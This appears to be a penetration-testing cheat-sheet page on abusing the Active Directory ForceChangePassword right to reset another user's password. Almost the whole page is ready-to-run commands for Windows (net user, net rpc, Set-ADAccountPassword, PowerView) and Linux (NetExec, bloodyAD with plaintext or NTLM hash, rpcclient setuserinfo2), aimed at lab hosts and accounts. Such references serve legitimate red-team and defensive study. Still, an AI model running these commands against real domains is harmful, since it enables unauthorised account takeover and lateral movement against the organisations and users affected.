# ForceChangePassword If the attacker control an account that has `GenericAll`, `AllExtendedRights`, or `User-Force-Change-Password` over the target account, then the latter's password can be modified. ## Windows {% hint style="warning" %} The `net user` command requires administrative privileges. {% endhint %} {% code overflow="wrap" %} ```shellscript #---------------------# # Living off the Land # #---------------------# # Net net user bob Passw0rd123! /domain # Net RPC net rpc password "bob" "newP@ssword123!" -U "marvel.local"/"x7331"%"Passw0rd123!" -S "dc01.marvel.local" # AD Module Set-ADAccountPassword bob -NewPassword $((ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)) -Reset -Verbose #-----------# # PowerView # #-----------# # Create a PSCredential object for the current user $SecPassword = ConvertTo-SecureString 'Passw0rd123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('marvel\x7331', $SecPassword) # Change the user's password Set-DomainUserPassword -Identity bob -AccountPassword $((ConvertTo-SecureString 'NewPassw0rd123!' -AsPlainText -Force)) -Credential $Cred -Verbose ``` {% endcode %} ## Linux This permission can be leveraged from Linux using [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), [`net`](https://linux.die.net/man/8/net), or [`rpcclient`](https://www.kali.org/tools/samba/#rpcclient). {% code overflow="wrap" %} ```bash # NetExec nxc smb 10.10.10.1 -u x7331 -p 'Passw0rd123!' -M change-password -o USER=bob NEWPASS='NewPassword123!' # BloodyAD with plaintext credentials bloodyAD -d marvel.htb -u x7331 -p 'Passw0rd123!' --host dc01.marvel.local set password bob 'NewPassword123!' # BloodyAD with NTLM hash bloodyAD --host 10.10.10.1 -d marvel.local -u x7331 -p :70016778cb0524c799ac25b439bd6a31 set password bob 'NewPassw0rd123!' # Net net rpc password bob 'newPassword123!' -U marvel.local/x7331%'Passw0rd123!' -S 10.10.205.81 # RPC rpcclient -U marvel/x7331%'Passw0rd123!' 10.10.205.81 > setuserinfo2 bob 23 'newPassword123!' # OR > chgpasswd3 bob 'OldPassword123!' 'NewPassw0rd123!' > exit ``` {% endcode %}